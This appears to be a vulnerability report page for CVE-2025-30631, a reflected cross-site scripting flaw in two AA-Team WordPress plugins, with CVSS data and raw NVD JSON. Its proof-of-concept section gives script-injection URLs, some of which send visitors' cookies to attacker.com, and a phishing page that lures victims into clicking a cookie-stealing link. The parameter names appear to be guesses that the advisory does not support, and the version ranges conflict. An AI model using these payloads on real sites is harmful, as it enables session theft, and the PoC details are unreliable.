Security Vulnerability Report
CVE-2025-30631 CVSS 7.1 HIGH

Published: 2026-01-06 21:15:42
Last Modified: 2026-04-28 19:30:21

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AA-Team Woocommerce Sales Funnel Builder, AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows Reflected XSS. This issue affects Woocommerce Sales Funnel Builder: from n/a through 1.1; Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Woocommerce Sales Funnel Builder < 1.1
Amazon Affiliates Addon for WPBakery Page Builder < 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-30631 Reflected XSS PoC -->
<!-- Example malicious URL construction -->

<!-- Woocommerce Sales Funnel Builder XSS -->
https://target-site.com/?s=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://target-site.com/?woof_search=%3Cimg%20src=x%20onerror=alert%28%22XSS%22%29%3E

<!-- Amazon Affiliates Addon XSS -->
https://target-site.com/?amazon_search=%3Cscript%3Efetch%28%27https://attacker.com/steal?c=%27%2Bdocument.cookie%29%3C/script%3E
https://target-site.com/?vc_azon=%3Csvg/onload=alert%28document.domain%29%3E

<!-- Complete attack HTML page example -->
<!DOCTYPE html>
<html>
<head><title>XSS Attack</title></head>
<body>
  <h1>Click to view your account</h1>
  <a href='http://target-site.com/?s=%3Cscript%3Efetch%28%27https://attacker.com/steal?c=%27%2BencodeURIComponent%28document.cookie%29%29%3C/script%3E'>
    Click Here
  </a>
</body>
</html>

<!-- Automated detection script -->
<script>
// Check whether the vulnerability is present
const testPayload = '<img src=x onerror=console.log("XSS")>';
const testUrl = window.location.origin + '/?s=' + encodeURIComponent(testPayload);
// In a real attack, fetch is used to send the cookie to the attacker's server
</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30631", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:42.407", "lastModified": "2026-04-28T19:30:21.270", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AA-Team Woocommerce Sales Funnel Builder, AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows Reflected XSS.This issue affects Woocommerce Sales Funnel Builder: from n/a through 1.1; Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/azon-addon-js-composer/vulnerability/wordpress-amazon-affiliates-addon-for-wpbakery-page-builder-formerly-visual-composer-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/plugin/woosales/vulnerability/wordpress-woocommerce-sales-funnel-builder-plugin-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}